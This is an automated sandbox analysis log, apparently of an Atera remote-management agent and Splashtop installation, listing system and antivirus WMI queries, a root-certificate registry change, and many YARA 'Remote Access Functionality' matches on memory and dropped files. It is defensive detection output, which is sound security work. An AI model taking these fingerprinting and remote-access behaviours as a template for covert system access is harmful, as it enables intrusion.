                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIC672.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIC961.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIC961.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIC961.tmp-\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIDCAB.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIDCAB.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIF4AD.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIF4AD.tmp-\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00415508 GetSystemTimeAsFileTime,__aulldiv,36_2_00415508
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0041C76C __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,36_2_0041C76C
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00429420 GetVersionExW,36_2_00429420
                                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiVirusProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiSpywareProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from FirewallProduct

                                Remote Access Functionality

                                Source: Yara matchFile source: 20.2.AgentPackageAgentInformation.exe.1be62a40000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.AteraAgent.exe.1c5cb450000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.0.AgentPackageAgentInformation.exe.1be62230000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.0.AgentPackageSTRemote.exe.21719510000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000001F.00000002.2086909400.0000022D4CA70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2089827549.000002332A61B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD2252000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1970116257.000002696E940000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD15B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1794278518.00007FFD9B694000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD2254000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD205000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2935178142.0000016BD0CD0000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000000.1924528514.000001BE62232000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789419276.000001C5CB820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD202000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2935401771.0000016BD0D4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2267142526.0000020AA07DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1970238618.000002696EA14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD20A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2263664624.000000CBDA8F5000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2644865064.00000217196FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2644865064.00000217196BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1788731094.000001C5CB54C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.1992596648.000002332A8C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2089827549.000002332A633000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2198254091.000002E967C21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2974355709.0000016BEA23D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD2175000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2644865064.00000217196B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD236000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000000.2010019478.0000021719512000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1970238618.000002696E9CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1955362018.000001BE62C63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1969655757.0000026900073000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD24C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2179995487.000002E94EAA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1954314035.000001BE6236E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2089827549.000002332A610000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2179995487.000002E94EADB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1788731094.000001C5CB520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1BD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2181419382.000002E94ED90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA1044000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2267142526.0000020AA078E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1788731094.000001C5CB526000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000024.00000002.2614681807.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F523000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2267142526.0000020AA0804000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2974355709.0000016BEA2A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2648816776.0000021719F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2644540988.0000021719670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD0D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2974355709.0000016BEA295000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2935401771.0000016BD0D96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD159000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2978322929.0000016BEA6E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2938112807.0000016BD0FC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1788731094.000001C5CB5B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000024.00000002.2618143412.0000000000620000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD15C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2267142526.0000020AA0750000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2972325371.0000016BE9E4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2090008634.000002332A8A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1F78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F64C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1788731094.000001C5CB562000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD21EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2648816776.0000021719FB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1955362018.000001BE62BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1793099468.000001C5E5CB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2267142526.0000020AA082C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2935401771.0000016BD0D10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2648816776.000002171A14A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1969655757.0000026900001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F72A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 2256, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 2084, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: AteraAgent.exe PID: 2640, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: AteraAgent.exe PID: 6200, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 3320, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: AgentPackageAgentInformation.exe PID: 2916, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: AgentPackageAgentInformation.exe PID: 2932, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: AteraAgent.exe PID: 1852, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: AgentPackageAgentInformation.exe PID: 980, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: cmd.exe PID: 3632, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: cscript.exe PID: 6768, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: AgentPackageSTRemote.exe PID: 1016, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: SplashtopStreamer.exe PID: 7384, type: MEMORYSTR
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF6260B0A6EE189872.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DFF7EC8F46D19662E2.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll, type: DROPPED
Source: Yara match, File source: C:\Config.Msi\44c50b.rbs, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF8B9C4281082EB5A9.TMP, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF8F3A4106A89D3FAA.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DFE942440AACDF3AD6.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF8C6157FE5230C8C7.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF98EF70557B828906.TMP, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_000_dotnet_runtime_6.0.35_win_x64.msi.log, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF80F0F0EF5EAF0872.TMP, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DFBAFD6533B3289355.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF91BDF3C96D5F451B.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_002_dotnet_host_6.0.35_win_x64.msi.log, type: DROPPED
Source: Yara match, File source: C:\Windows\Installer\MSIDCAB.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF070AB763D94BC4D6.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_001_dotnet_hostfxr_6.0.35_win_x64.msi.log, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DFE999D03EF0B2A4AD.TMP, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
Source: Yara match, File source: C:\Windows\Installer\MSIDEDF.tmp, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF18D9F86597CA5126.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF1972A83F22094FA6.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DFECDCDF0BA996B022.TMP, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF1D98EA98A0F27BD7.TMP, type: DROPPED
